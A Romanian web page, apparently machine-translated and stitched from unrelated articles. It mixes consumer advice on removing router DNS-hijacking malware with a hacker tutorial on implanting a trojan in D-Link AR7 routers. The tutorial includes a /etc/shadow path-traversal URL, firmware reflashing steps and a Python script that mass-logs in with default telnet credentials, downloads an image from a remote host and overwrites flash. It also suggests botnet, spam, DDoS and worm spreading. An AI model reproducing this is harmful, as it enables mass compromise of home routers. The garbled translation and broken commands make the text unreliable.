Vi se poate părea ciudat, dar există viruși care nu infectează computerele, laptopurile sau dispozitive mobile, și routere.
De ce să faci asta? Apoi, deși routerul dvs. nu stochează niciunul informatie pretioasa, Acces la acest aparat vă va permite să modificați parametrii serverului DNS. Acest lucru, la rândul său, va permite escrocilor să trimită unele dintre solicitările dvs. către site-uri false în care intrați informații confidențiale util pentru escroci. Multe modele de routere sunt susceptibile la infecție, lista este inutilă, deoarece poate fi actualizată în mod constant. Pentru siguranța dumneavoastră, vă recomand cu recomandări care vă vor permite să evitați infectarea.
Cum funcționează un virus?
Computerul dvs. este infectat cu un virus numit Win32.Sector. Acesta, la rândul său, descarcă Trojan.Rbrute de pe un server special, care caută în rețea routere și încearcă să acceseze configurația. După obținerea accesului, schimbă curentul adrese DNS, înregistrate în router, la propriile lor. Apoi, toate dispozitivele conectate la router ajung pe pagina de pe care este descărcat Win32.Sector.
- Pictograma „Internet” este activată, dar nu puteți accesa majoritatea site-urilor sau sunt încărcate site-urile greșite pe care doriți să le deschideți
- Site-uri de neînțeles se deschid spontan
- Computerul nu poate obține o adresă IP din rețeaua dvs. (i se atribuie o adresă precum 169.254.xxx.xxx pe subrețeaua Microsoft)
Cum se elimină virusul Trojan.Rbrute de pe router?
- În primul rând, trebuie să resetați setările routerului la setările din fabrică. Pentru a face acest lucru, țineți apăsat butonul „Reset” de pe spatele routerului și așteptați 10 secunde până când routerul clipește cu toți indicatorii și repornește.
2. Mergem la panoul de administrator al routerului și schimbăm parola standard acces la panoul de administrare pe cont propriu, de preferință mai dificil.
3. Configuram din nou routerul, verificam daca Internetul functioneaza corect.
4.De pe site-ul oficial al producătorului routerului, descărcați cel mai recent firmware pentru modelul tău și coase-l. Cel mai probabil în ultima versiune găurile de firmware prin care atacatorii au obținut acces la setările routerului sunt închise.
5. După aceea, verificăm computerul pentru malware pentru a exclude posibilitatea ca WinSector sau Trojan.Rbrute să rămână pe hard diskul computerului. O poți face fonduri gratuite din articol
Sper că articolul meu te-a ajutat =)
Bună, cititorul meu! În acest articol voi vorbi despre minunatele routere ADSL
- de neînlocuit acasă și retelele industriale bucăți de fier. Îți voi spune despre întrebare
exploatarea acestor bucăți de fier în scopuri benefice nouă – coaserea într-un mod brutal
Troian în interiorul routerului. Și în așa fel încât nici
administrator inteligent, fără utilizator cu urechi.
IQ dorințe sau cerințe
Când am scris acest articol, am presupus că citirea lui ar fi suficientă
utilizator avansat cu GNU\Linux instalat, care are și unele abilități
lucru și programare în aceasta sistem de operare... Totuși, se pare
este posibil să repet acțiunile mele pe Windows (folosind Cygwin, de exemplu), dar
nu va fi descris. Pentru o plăcere maximă, ai nevoie și tu
abilități în deținerea unui fier de lipit (acest lucru este opțional).
Și totul a început...
Ceva ce am fost distras. Deci, totul a început cu cum într-o zi chiar asta
o bucată de fier, sau mai bine zis, a întrerupt în mod trădător conexiunea la Internet și nu a făcut-o
a vrut să-l restaureze. În același timp, era departe, cu acces fizic
nu era nimeni să o vadă (cu toate acestea, ceva ce am mințit - eram prea lene să mă ridic de pe canapea
reporniți routerul :)), interfața web nu a răspuns, dar mi-am amintit asta
chestia asta trebuie să fie telnet sau ssh. Accesați zona de administrare i
nu am încercat înainte și nu am schimbat imprudent parola cu mea cont(Cum
s-a dovedit mai târziu, degeaba, pentru că implicit este „admin: admin”). Deci eu
am încercat SSH și a funcționat!
$ ssh [email protected]
$ Parola:
Ca un șurub din albastru! BusyBox! Nu m-am gândit niciodată la sub cui
acest router este sub control, se dovedește - GNU / Linux! M-am simțit înfiorător
Mă întreb cum funcționează totul aici și, mental, datorită lenei și întâmplării, eu
s-a angajat într-un studiu.
Colectarea de informații
Deci de unde am început? Desigur, din listă comenzile disponibile:
# cutie ocupată
...
Funcții definite în prezent:
[, frasin, busybox, pisică, chgrp, chmod, chown, cp, dată, dd, df, ecou, fals, gratuit,
grep, nume de gazdă, id, ifconfig, init, insmod, kill, ln, autentificare, ls, lsmod, mkdir,
modprobe, mount, mv, passwd, ping, ps, pwd, repornire, rm, rmmod, traseu, sh, somn,
sincronizare, gudron, testare, tftp, atingere, adevărat, tty, umount, wget, whoami, da
Setul este destul de sănătos, suficient pentru cercetarea normală și implementarea ideilor.
Următorul a trezit interesul pentru versiunea de kernel:
# cat / proc / versiune
Linux versiunea 2.4.17_mvl21-malta-mips_fp_le ( [email protected]) (gcc versiunea 2.95.3
20010315 (lansare / MontaVista)) # 1 Thu Dec 28 05:45:00 CST 2006
Pentru referință: MontaVista este o distribuție încorporată
sisteme. Marea majoritate a producătorilor echipamente de retea da gratis
preferinta pentru acest sistem. Poate fi găsit și pe alte dispozitive, de exemplu, în
cărți electronice sau telefoane mobile.
# cat / etc / versiuni
CLIENT = DLinkRU
MODEL = DSL-500T
VERSIUNEA = V3.02B01T01.RU.20061228
HTML_LANG = EN.302
BOARD = AR7VW
VERSION_ID =
CPUARCH_NAME = AR7
MODEL_ID =
FSSTAMP = 20061228055253
# cat / proc / cpuinfo
procesor
: 0
model CPU
: MIPS 4KEc V4.8
BogoMIPS
: 149.91
așteptați instrucțiune: nu
temporizatoare de microsecunde: da
vector de întrerupere suplimentar: da
Punct de supraveghere hardware: da
Excepții VCED: nu sunt disponibile
Excepții VCEI: nu sunt disponibile
AR7 este un cip dual-core dezvoltat de Texas Instruments. El
conține un router ADSL cu drepturi depline pe un singur cip care acceptă standardele ADSL1,
ADSL2, ADSL2 +. Bazat pe procesor MIPS 4KEc RISC de înaltă performanță, cu
frecvența ceasului 175 sau 233 (în funcție de tehnologia de producție: 18 microni
sau 13 microni). Cipul conține la bord 2 interfețe UART, dintre care una (UART_A)
este folosit pentru a afișa informații de depanare, precum și o interfață EJTAG care servește
pentru depanare (intermitent) Memorie flash. Utilizarea acestor interfețe va fi
descris mai jos.
În cele din urmă, m-am uitat la informațiile de memorie:
# cat / proc / monturi
/ dev / mtdblock / 0 / squashfs ro 0 0
niciunul / dev devfs rw 0 0
proc / proc proc rw 0 0
ramfs / var ramfs rw 0 0
# cat / proc / mtd
dev: size erasesize nume
mtd0: 0034f000 00010000 „mtd0”
mtd1: 00090f70 00010000 „mtd1”
mtd2: 00010000 00002000 „mtd2”
mtd3: 00010000 00010000 „mtd3”
mtd4: 003e0000 00010000 „mtd4”
Desigur, fără a uita de adresele de bloc:
# cat / proc / ticfg / env | grep mtd
mtd0 0x900a1000,0x903f0000
mtd1 0x90010090,0x900a1000
mtd2 0x90000000,0x90010000
mtd3 0x903f0000,0x90400000
mtd4 0x90010000,0x903f0000
Din cele de mai sus, a rezultat că memoria Flash (/ dev / mtdblock) are 5 blocuri:
mtd0- imagine Sistemul de fișiere SquashFs. Acesta este un fișier special
un sistem comprimat doar pentru citire. Pentru
compresia folosește algoritmul gzip, dar în în acest caz- LZMA (raport de compresie
de mai sus). Dimensiunea acestui bloc este de 4 MB.
mtd1- acest bloc conține nucleul MontaVista comprimat de algoritmul LZMA
stare, dimensiune bloc 600 KB.
mtd2- Bootloader ADAM2, realizează boot-ul kernel-ului, are și
Serviciu server FTP pentru recuperare și intermitent. Mai multe detalii despre el vor fi
spuse mai departe. Dimensiunea blocului este de 64 KB.
mtd3- partajat între datele de configurare și mediu
bloc (variabile de mediu), care poate fi vizualizat în / proc / ticfg / env.
Datele de configurare se află în /etc/config.xml. Intermediar între dosar
sistem, blocul de configurare este unul închis (ca toate cm_ *, control, oh
ei mai târziu) programul cm_logic. Dimensiunea acestui bloc este, de asemenea, de 64 KB.
mtd4- acesta conține semnătura firmware-ului, nucleul și imaginea fișierului
sisteme. Acest bloc este utilizat la actualizarea firmware-ului prin interfața Web.
Inițial, este stocat în acest bloc, apoi este verificată suma de control
și, dacă converge, se înscrie pentru noua sa poziție.
RAM (16 MB la acest model, dar ADAM2 la acest model
vede doar 14 MB, este tratat cu o actualizare), montat în directorul / var și acesta
puteți utiliza în siguranță în scopurile noastre:
#gratuit
totalul de buffere partajate gratuite utilizate
Mem: 14276 10452 3824 0
Să nu uităm să trecem peste lista de procese. Dintre cele interesante au pândit aici
demoni: thttpd - Web-server; dproxy - cache Interogări DNS server proxy; ddnsd
- daemon DNS; pppd ... - demonul real care implementează conexiunea prin protocol
PPP, iar în parametri vedem datele contului. Deci, dacă routerul nu
se preface a fi un furtun (a se citi - nu în modul pod), atunci poți
ușor să obții un cont.
Programele cm_ * sunt proprietare și sunt deja incluse în codurile sursă.
compilate (aceste programe sunt dezvoltate și de Texas Instruments, pe D-Link
nu trebuie să înjurați pentru nerespectarea licențelor).
cm_logic- un program care controlează logica sistemului, prin intermediul acestuia
configurația trece prin; sincronizează /etc/config.xml cu
partea corespunzătoare a conținutului / dev / ticfg (care indică mtd3).
cm_cli- interfata Linie de comanda pentru management și configurare
sisteme. De exemplu, setările de conectare se fac prin această interfață.
cm_buc- rulează și monitorizează procesele, legături către reguli
(de exemplu, rulați programul ca demon, regulile includ și informații despre
porturi de deschis) descrise în /etc/progdefs.xml; încărcat imediat după
miezuri.
webcm- Interfață CGI, plină de găuri, de exemplu vă permite să priviți / etc / umbră,
doar prin referire la url.
http://192.168.1.1/../../../etc/shadow
Nu am nimic, thttpd nu este atât de simplu, dar dacă da:
http://192.168.1.1/cgi-bin/webcm?getpage=/etc/shadow
Alt lucru. Acesta poate fi folosit pentru a colecta informații dacă nu există acces la
ssh / telnet, dar există acces la interfața web.
firmwarecfg- utilizat pentru firmware prin interfața Web. La intrare
a acestui program, o imagine este trimisă de pe interfața Web printr-o solicitare POST și este deja
redirecționează către memoria Flash după verificare suma de control imagine.
Acest lucru completează colectarea de informații primare, este timpul să trecem la decisiv
actiuni.
Instalarea instrumentelor de dezvoltare și compilarea firmware-ului
Firmware Routere D-Link(și toate celelalte bazate pe GNU/Linux)
distribuite sub licență GPL, le puteți obține la oficial
server FTP. De fapt, puteți alege oricare din lista de firmware-uri sugerate,
sunt aceleași (în ceea ce privește seria T). Livrarea conține codul sursă al nucleului, al mediului,
instrumentele și lanțul de instrumente necesare pentru a dezvolta / compila existente
programe. Ar trebui să fie despachetat la rădăcină și adăugat la variabila de mediu
Calea PATH către directorul bin al lanțului de instrumente:
$ tar xvf tools.tgz
$ export PATH = $ PATH: / opt /
Acum pentru a compila dvs propriul firmware, accesați directorul
Cu codurile sursăși executați același model.
$ cd DSL / TYLinuxV3 / src && make
Vor fi adresate multe întrebări despre activarea suportului pentru dispozitiv (mai bine
raspunde-le pozitiv). La sfârșitul compilației în directorul TYLinuxV3 / images
vor fi create imagini de firmware. De asemenea, puteți rula scriptul cu același nume cu al dvs
model din directorul / TYLinuxV3 / src / scripts.
Câteva cuvinte despre transferul de fișiere între un router și un computer. Chiar primul
metoda pe care am aplicat-o este capacitatea de a transfera fișiere folosind protocolul SSH,
folosind programul scp. Dar puțin mai târziu am aflat că mc (Midnight
Commander) are și capacitatea de a se conecta prin SSH (Panel -> Conexiune Shell).
Alternativ, puteți configura un server Web sau FTP la locul de muncă. Mai tarziu eu
a dat preferință serverului web, pentru că funcționează cel mai rapid. am instalat
thttpd, mic și rapid, la fel ca pe un router. O pornim și o tragem
fișierul router, după ce ați accesat directorul / var (așa cum s-a menționat
disponibil anterior pentru înregistrare).
$ thttpd -g -d ~ / ForRouter -u utilizator -p 8080
# cd / var
# wget http://192.168.1.2/file
Pentru a extrage fișierul de pe router, puteți deschide și serverul web:
# thttpd -g -d / var -u root -p 8080
Atenție, dacă doriți să descărcați fișierul executabil de pe router, ar trebui
elimina drepturile de lansare. La descărcare un numar mare fișierele de pe router
este mai bine să folosiți mc, nu va trebui să copiați mai întâi fișierele în / var și
eliminați drepturile și apoi ștergeți aceste fișiere pentru a elibera spațiu. În general, cazul
gust, alege orice variantă care ți se potrivește.
Crearea propriului program
Să începem, desigur, cu clasicul program HelloWorld. Unele speciale
nu sunt reguli. Textul programului este dureros de familiar:
#include
#include
int main (void)
{
printf ("Mate.Feed.Kill.Repeat.");
returnează 0;
}
Compilați (calea către lanțul de instrumente trebuie specificată în variabila de mediu
CALE):
$ mips_fp_le-gcc hell.c -o iad
$ mips_fp_le-strip -s iadul
# cd / var
# chmod + x iad
# ./iad
Și... nu se va întâmpla nimic, sau notificarea de cale va fi aruncată nu a fost gasit... Ce este
caz? Am vorbit deja despre cm_pc - acest program lansează altele în
conform regulilor descrise în /etc/progdefs.xml. Acum a sosit momentul
modificați și flash imaginile sistemului de fișiere.
Modificarea sistemului de fișiere
Pentru a modifica sistemul de fișiere, mai întâi trebuie
despacheta. După cum am menționat, sistemul de fișiere de aici este SquashFs cu patch-ul LZMA.
Pachetul pentru dezvoltarea firmware-ului include doar programul mksquashfs (pentru a crea
imagine), unsquashfs (pentru despachetare) lipsește. Dar nu contează, totul este disponibil
pe site-ul sistemului de fișiere, avem nevoie de prima versiune. Prin aplicarea unui plasture LZMA și
după ce au adunat utilitățile, le-am așezat într-un loc convenabil. În primul rând, obținem imaginea
sistem de fișiere de la router:
# cat / dev / mtdblock / 0> /var/fs.img
$ mkdir unpacked_fs
$ unsquashfs fs.img unpacked_fs
Acum îl puteți modifica după cum doriți, sau putem arunca FuckTheWorld în
directorul / bin și adăugați o regulă pentru a rula în /etc/progdefs.xml.
$ cp salut unpacked_fs / bin
$ vim unpacked_fs / etc / progdefs.xml
Și adăugați acest lucru (între etichete
Economisim și împachetăm înapoi:
$ mksquashfs unpacked_fs my_fs.img -noappend
Vă rugăm să rețineți că imaginea sistemului de fișiere nu trebuie să depășească
dimensiuni admisibile. Dacă ai dorința de a încerca ceva urgent și nu
fit, eliminați din imagine ceva „inutil” precum grep, whoami sau
folosiți ambalatorul fișiere executabile UPX. Acum încărcați pe router
imagine și treceți la secțiunea următoare.
Captură imagine sistemului de fișiere
Metoda de flashing a routerului este foarte simpla, consta in accesarea dispozitivului
/ dev / mtdblock / *. Deci, umplem routerul cu oricare într-un mod convenabil imagine de fișier
sisteme și faceți această acțiune simplă:
# cat my_fs.img> / dev / mtdblock / 0 && reporniți
# cp my_fs.img / dev / mtdblock / 0 && reporniți
După un timp, când procesul de înregistrare a trecut, routerul se va reporni și
modificările vor intra în vigoare. Încercând să rulăm exemplul nostru:
# iad
Mate.Feed.Kill.Repeat.
Metode de recuperare în caz de defecțiune
Înainte de a intermite router-ul cu „crafts” mai serioase, ar trebui să aflați cum
cum să acționați în cazurile critice când routerul refuză
sarcină. Nu există situații fără speranță. Serverul FTP ADAM2 vine în ajutor. Pentru
mai întâi trebuie să rulați clientul FTP la adresa IP a ADAM2, care poate fi spionată
în / proc / ticfg / env (parametrul my_ipaddress).
$ ftp 192.168.1.199
220 ADAM2 Server FTP gata.
530 Vă rugăm să vă autentificați cu USER și PASS.
Pentru claritate, puteți activa modul de depanare, apoi totul
informații și toate răspunsurile FTP:
Autentificare / parolă - adam2 / adam2. Procesul de intermitent este foarte simplu. A începe
transferați sesiunea FTP în modul binar:
ftp> citat MEDIA FLSH
Acum trimitem, de exemplu, o imagine a sistemului de fișiere și indicăm locația
destinaţie:
ftp> pune fs.img „fs.img mtd0”
Așteptăm sfârșitul înregistrării, reporniți routerul, ieșim din sesiune:
ftp> citat REBOOT
ftp> ieși
Tot! După cum poți vedea, nu este nimic dificil, acum dacă ceva nu merge bine, tu
poți oricând să remediezi situația.
Pentru confortul muncii, ar trebui să dați o adresă IP normală, activați
incarcare automata (pentru a nu dansa cu resetare) si mariti putin timpul
așteptând o conexiune înainte de a încărca nucleul. Toți acești parametri sunt stocați în
variabile de mediu, există speciale comenzi FTP ADAM2: GETENV și SETENV (pentru
obținerea și, respectiv, setarea unei variabile). V sesiuni FTP introduceți următoarele
comenzi:
ftp> SETENV autoload, 1
ftp> SETENV autoload_timeout, 8
ftp> SETENV adresa_miu, 192.168.1.1
ftp> citat REBOOT
ftp> ieși
Routerul repornește și vă puteți conecta la ADAM2 la 192.168.1.1:21. Dacă
va exista dorința de a reflash imaginea nucleului, iar nucleul va refuza să pornească, FTP
va începe singur. Înainte de a afișa intermitent imaginile modificate, asigurați-vă că
economisiți curentul pentru recuperare. În general, puteți modifica variabilele de mediu
și prin / proc / ticfg / env, am vrut doar să vă spun mai multe despre lucrul cu FTP.
# echo my_ipaddress 192.168.1.1> proc / ticfg / env
Și puteți verifica modificările astfel:
# cat / proc / ticfg / env | grep adresa_miu
Ce să faceți dacă doriți să încercați să reîncărcați bootloader-ul și cum
sa actioneze in caz de esec? Fie routerul nu pornește dintr-un motiv oarecare și
nu are acces la ADAM2? Există o cale de ieșire - JTAG, sau mai degrabă, acest cip conține EJTAG
(versiunea extinsa). Este o interfață pentru depanare/programare în circuit.
Pentru a vă conecta la această interfață, avem nevoie de portul LPT al computerului,
conectori și 4 rezistențe. Schema este foarte simplă.
Mă grăbesc să observ că firmware-ul prin JTAG nu este rapid, va dura destul
mult timp. Deci, merită folosit doar pentru a restabili bootloader-ul,
chiar dacă nu funcționează. Pentru a comunica prin JTAG, ar trebui să utilizați un special
un program precum UrJTAG. Mai jos este un exemplu despre cum funcționează această interfață.
Stabilirea unei conexiuni:
jtag> cablu paralel 0x378 DLC5
jtag> detect
Detectare memorie flash:
jtag> detectflash 0x30000000 1
Citirea memoriei flash:
jtag> readmem 0x30000000 0x400000 fullflash.img
Scriere în memorie (bootloader):
jtag> flashmem 0x30000000 adam2.img
De asemenea, este util să știți despre interfața UART (am promis că voi vorbi despre asta mai devreme). V
UART_A raportează, adică înregistrează bootloader-ul (într-un stadiu incipient al încărcării de la
poti vorbi cu el) si miezul. Când scrieți nuclee modificate, este
indispensabil pentru depanare. UART - Receptor/Transmițător asincron universal
(transceiver universal asincron) este aproape întotdeauna prezent
microcontrolere.
Circuitul adaptorului este foarte simplu. Bazat pe un singur microcircuit -
Convertor de nivel TTL: MAX232 pentru COM și FT232R pentru USB. Microcircuite
sunt destul de comune și nu vor fi probleme cu achiziția.
Circuitul urmează să panou(care poate fi plasat în siguranță în carcasă
conector port COM) în 20 de minute și aduce o mulțime de beneficii. De exemplu, la depanare
nucleele sunt o soluție absolut de neînlocuit. Și dacă electronicele sunt strânse? Ieșire
sunt cabluri USB pentru telefoane vechi, au doar un convertor
UART - USB.
Câteva idei de distribuție
Proxy-ul/sox-ul tău pe routerul altcuiva este grozav. Ca, de fapt, și spam
peste toate protocoalele router. Acesta nu este un computer Windows pentru tine, care
reamenajat lunar :). Deseori, routerele nu se schimbă sau nu se reflashează. da si
Cine în afară de noi va avea în cap ideea unei infecții cu router?
Nu uitați, avem tot traficul de la utilizator/rețea sub controlul nostru. Pentru mai mult
routere puternice, este deja posibil să suspendați un bot DDOS. Ascunde fișierul / ascunde procesul,
interceptați scrierea în blocuri mtd, eliminând ștergerea programului nostru - tot ceea ce
tot ceea ce!
Să presupunem că sunteți pe cale să începeți să scrieți un program serios pentru un router.
Depanarea foarte bună este importantă, probabil că va trebui să o faci de mai multe ori
rescrie/restaurează imagini... Aceasta este o perspectivă foarte tristă. Chiar și mâinile
coboară puțin, dacă mai ținem cont că resursa de rescriere a memoriei Flash
mic (pentru mai multe detalii vezi documentația pentru cipul de memorie), și există o perspectivă
lasa ea. Dar există o cale de ieșire! Qemu poate emula AR7! Vă puteți imagina ce
oferă posibilități și confort nesfârșit? Acum nimic nu ne stă în cale
scrie ceva incredibil de tare!
Asa de. Ai scris un program, l-ai verificat pe cont propriu sau pe routerele altor 1-2, dar la urma urmei
toată rețeaua este încă înainte, infectarea manuală este tristă, pornești deja pe al 10-lea router
blestemă lumea întreagă, și plutește în ochii șirurilor de „cat” și „mtd”. Vom scrie
program pentru automatizarea acestora activități de rutină... Am ales limbajul python.
Planul de lucru este următorul:
- compilarea unei liste de routere, de exemplu, folosind nmap;
- scriptul ar trebui să ia din listă în ordinea adresei IP, treceți
telnet cu un login/parolă standard; - apoi aceleași acțiuni: încărcați imaginea modificată,
suprascrie, repornește.
#! / usr / bin / env python
# Codificare = UTF-8
import telnetlib, ora
SERVER = „http://anyhost.com/fs.image”
pentru addr în deschis ("iplist.txt"):
telnet = telnetlib.Telnet (adresă)
telnet.set_debuglevel (1)
telnet.read_until ("conectare:")
timp.somn (5)
telnet.write ("admin \ n")
telnet.read_until ("Parola:")
telnet.write ("admin \ n")
telnet.read_until ("#")
telnet.write ("cd / var && wget" + SERVER)
telnet.read_until ("#")
telnet.write ("cat fs.image> / dev / mtdblock / 0")
telnet.read_until ("#")
telnet.write ("repornire")
telnet.close ()
Logica scenariului este foarte departe de a fi ideală, acum voi explica de ce. Pentru
mai întâi, ar trebui să verificați versiunea de firmware/kernel și modelul de router, deoarece ar putea exista
diferențe serioase în muncă. Mai mult, în loc de spații de firmware, ar trebui să pompați
imaginea sistemului de fișiere de pe router, despachetați, modificați și trimiteți
înapoi. Acest lucru va elimina problemele de compatibilitate între diferite
modele / versiuni de firmware, deoarece stabilitatea muncii este cel mai important lucru pentru tine.
De asemenea, virusul poate avea funcțiile unui vierme și, dacă doriți, puteți oricând
înșurubați un scanner de rețea, forță brută pentru RDP și cipuri similare cu acesta.
Există o altă metodă grozavă de distribuție. Nimic nu te împiedică să scrii
program pentru Windows, care va avea cu dvs. (sau descărcați de pe dvs
server) imaginea sistemului de fișiere și infectați routerul cu aceasta, dacă este prezent.
Redistribuiți acest program prin toate mijloacele „standard”: unități amovibile,
exploit-uri pentru programe, infectarea altor programe... Prin combinarea acestor metode,
poți crea o pandemie gravă. Imaginează-ți imaginea asta - până la urmă
dispozitive similare sunt omniprezente.
Protecție router
După ce am dezgropat toate acestea, m-am gândit: cum poți proteja un router? Și apoi, vezi, și
O voi lua eu. Primul pas este schimbarea parolei utilizatorului într-o parolă mai complexă și
lung (limită - 8 caractere), schimbați bannere și felicitări de serviciu
(cu un editor hexadecimal, sau, ceea ce este de preferat, recompilați programele), astfel încât
nmap sau alte scanere nu au putut detecta versiunile de servicii.
De asemenea, ar trebui să schimbați porturile pe care se agăță demonii. Acest lucru este realizat de
modificări progdefs.xml. Omorâți telnetul (cel mai ușor mod de a găsi o parolă pentru el, da
iar protocolul este neprotejat, de ce avem nevoie), porniți firewall-ul, permiteți conexiunea
la servicii numai de la propria dumneavoastră adresă IP sau MAC. Utilizați și un firewall
pentru a proteja o rețea sau un computer, nu degeaba este prezent. Setare competentă
regulile te vor ajuta întotdeauna să te aperi.
Concluzie
Multe, nu numai routerele D-Link și alte dispozitive similare sunt construite
Cip AR7, lista include Acorp, NetGear, Linksys, Actionec...
acest AR7 este popular împreună cu MontaVista. De aici rezultă că folosind același lucru
lanţ de instrumente, fără probleme speciale poti urma pasii descrisi in articol.
Gândește-te bine: în plus acțiuni rău intenționate poți să faci ceva util/plăcut pentru tine
și altele (nu mă cert, plăcerea de a hacking nu poate fi înlocuită, dar totuși).
Vă puteți crea propriul firmware, de exemplu, mai mult routere puternice capabil de
descărcați/distribuiți torrente... Toate modelele au interfață USB 1.1, dar la cele mai tinere
modele, nu este lipit. Adăugați un modul USB și un driver de sistem de fișiere la kernel,
echipează routerul cu memorie Flash - și până la urmă primești ceva de genul stocare în rețea pe
putini bani. Există o mulțime de opțiuni, iar ideile ar trebui să apară în mii - nu
limitează-te, creează și creează!
Mai devreme, am scris despre falsificarea DNS, în urma căreia au apărut reclame și bannere ransomware pe computer. În unele cazuri, serverele DNS au fost modificate nu numai în Windows, ci și pe router. Din punct de vedere tehnic, substituția DNS nu este, desigur, un virus în sensul clasic al cuvântului, ci o setare rău intenționată, care totuși aduce multe inconveniente.
Care este rostul falsificării serverelor DNS și care este răul de la acesta
Serverul DNS este responsabil pentru maparea numelor de domenii la adrese IP. Serverele DNS frauduloase sunt capabile să potrivească numele oricărui site decent cu altul - o adresă greșită și să descarce conținut falsificat în loc de cel autentic. Dacă înregistrați un astfel de DNS „greșit” pe router, atunci toate dispozitivele conectate la acesta vor fi în pericol.
Arata cam asa. În timpul navigării pe site-uri, o pagină se deschide brusc cu o propunere de actualizare a playerului flash, java, instalare antivirus gratuit, descărcați un program presupus pentru a accelera și optimiza computerul sau orice alt lucru aparent inofensiv. Este important ca numele unui site familiar și de încredere să poată fi afișat în bara de adrese. Dacă utilizatorul descarcă și rulează fișierul propus, atunci cel mai probabil, în viitorul apropiat, va începe mari probleme de pe PC:
- Este posibil ca computerul dvs. să înceapă să afișeze reclame.
- Fișierele pot fi criptate.
- Când încercați să deschideți orice site, poate apărea o solicitare.
- Desktopul poate fi blocat de un winlocker, din nou cu cerința de a transfera bani pentru deblocare.
- Un computer poate fi folosit pentru a efectua atacuri pe internet pe site-uri și servere, pentru a sparge alte computere (botnet) și alte lucruri rele.
În același timp, de regulă, viteza computerului scade, există apeluri constante către Hard disk, utilizarea procesorului ajunge la 100% când este inactiv.
Cum se infectează routerul
De regulă, mai întâi, unul dintre computerele din retea locala... Virusul intră în computer atunci când descărcați un fișier de pe Internet. Apoi, el trimite cereri la adresele standard pentru echipamentele de rețea, poate scana cookie-uri, descărcați programe malware auxiliare (Trojan) și, ca urmare, intră în setările unui router sau modem ADSL.
Virușii și troienii pot modifica setările routerului (în special, falsificarea DNS) dacă:
1. Pentru a intra în interfața web, utilizați detalii standard- IP, autentificare și parolă (de exemplu, 192.168.1.1, admin / admin)
2. Adresa, autentificarea și parola routerului sunt salvate în browser.
Semne ale unei infecții cu router
(pot apărea atât semne împreună, cât și semne separate)
1. Pe dispozitivele care sunt conectate la router, reclamele apar, browserele deschid singure filele / ferestrele pop-up din stânga, poate apărea un banner ransomware pe tot ecranul.
2. Unele site-uri nu se deschid. În schimb, sunt afișate pagini web cu conținut ciudat sau cu o eroare „404”.
3. Nu există acces la Internet, deși LED-ul WAN / Internet este aprins.
4. Computerul obține o adresă IP din intervalul 169.254. *. *
Cum să eliminați un virus de pe un router
Cum să vă protejați routerul de viruși
1. Actualizați firmware-ul la cel mai recent
Accesați site-ul web al producătorului, introduceți modelul dvs. și descărcați cel mai recent firmware. Citiți mai departe, de exemplu, echipamentele TP-Link.
2. Setați o parolă personalizată pentru interfața web
Nu toate routerele permit schimbarea login-ului. Dar dacă instalezi parolă complexă, asta va fi suficient.
3. Interziceți conectarea la interfața routerului de pe Internet
4. Schimbați adresa IP a routerului în rețeaua locală
Nici măcar să nu vă îndoiți că primul lucru pe care îl va face un virus ruter cracker este să acceseze cele mai populare adrese: 192.168.0.1 și 192.168.1.1. Prin urmare, vă sfătuim să schimbați octetul al treilea și al patrulea adresa IP locală v setări LAN... Setați de exemplu:
192.168.83.254
După aceea, toate dispozitivele din rețea vor primi IP din intervalul 192.168.83. *
După modificarea IP-ului local al routerului, pentru a intra în interfața web, va trebui să introduceți http: // [adresă nouă]
5. Instalați un antivirus de încredere pe computer
Chiar dacă malware pătrunde în computer, acesta va fi neutralizat și nu va avea timp să infecteze routerul.
6. Nu salvați parolele în browser
Cred că vă puteți aminti parola de pe interfața web a routerului. Sau cel puțin notează-l pe hârtie.
Având în vedere incidența crescută a substituției Malware DNS programe de pe dispozitivele utilizatorilor de internet, se pune întrebarea Securitate Wi-Fi routere. Cum să verificați un router pentru viruși? Cum să eliminați un virus dintr-un router? Întrebarea este complexă și simplă în același timp. Există o soluție!
Virusul în sine nu se poate scrie pe majoritatea routerelor moderne din cauza spațiului mic din memoria routerului în sine, dar poate zombi routerul pentru a participa la o rețea botnet. De regulă, aceasta este o rețea bot pentru atacarea diferitelor servere sau pentru redirecționarea și analiza fluxurilor de informații care vă lasă pe Internet.
Parolele și corespondența personală pot cădea în mâinile intrușilor!
Acest lucru trebuie remediat cât mai curând posibil.
- Resetarea setărilor routerului
- Firmware-ul routerului
- Reconfigurare
Resetarea setărilor routerului
Puteți reseta setările routerului apăsând butonul de resetare. De obicei, acest buton este situat pe spatele routerului, unde și porturi LAN... De obicei butonul este încastrat în orificiu pentru a evita apăsarea accidentală, așa că trebuie să folosiți o scobitoare. Acest va șterge setările routerului modificate de virus și va instala setările din fabrică în locul lor. Trebuie să vă avertizez că dacă nu știți cum să configurați routerul, atunci haldă setările sale pentru dvs nu merita!
Firmware-ul routerului
Uneori virusul „inundă” firmware modificat la router. Puteți elimina firmware-ul virusului de pe router prin flash-ul din nou.
Conectați computerul la router cu un cablu LAN. cablu de retea Vine cu orice router. Sau prin Wi-Fi dacă nu există conexiune prin cablu. Mai bine te conectezi cu un cablu! Conexiune fără fir considerat instabil și nu este potrivit pentru firmware-ul routerului.
După ce ne-am conectat la router, deschidem browserul (Chrome, Opera, Mozilla, IE) și intră în bara de adresa adresa Router ASUS, pentru asus este 192.168.1.1, pe pagina care se deschide va trebui sa introduci un nume de utilizator si o parola pentru a intra in setarile routerului. Autentificare: admin, Parola: admin. Daca login-ul si parola nu sunt potrivite, intreaba-l pe cel care ti-a setat routerul, poate le-a schimbat.
Descărcați firmware-ul de pe site-ul producătorului și selectați firmware-ul de pe disc folosind pagina de setări a routerului. Pentru marea majoritate a routerelor, etapele firmware-ului sunt aceleași.
În urmă cu câteva săptămâni, specialiști în securitatea informatiei numit VPNFilter. După cum sa dovedit, scopul principal dintre acest malware sunt cele mai multe routere diferiți producători... Unul dintre primii care a atras atenția asupra VPNFilter a fost o echipă de specialiști în securitatea informațiilor de la Cisco Talos.
Malware-ul este îmbunătățit constant de către dezvoltatorii săi. A fost descoperit recent modul nou care folosește un tip de atac man-in-the-middle împotriva trafic de intrare... Atacatorii pot modifica traficul care trece prin router. De asemenea, pot redirecționa orice date către serverele lor fără probleme. Modulul de virus a fost numit ssler.
Pe lângă modificarea traficului de intrare, ssler poate transfera și creatorii săi datele personale ale victimei. Acestea pot fi parole pentru tipuri diferite resurse pe care infractorii cibernetici le folosesc apoi în scopuri diferite.
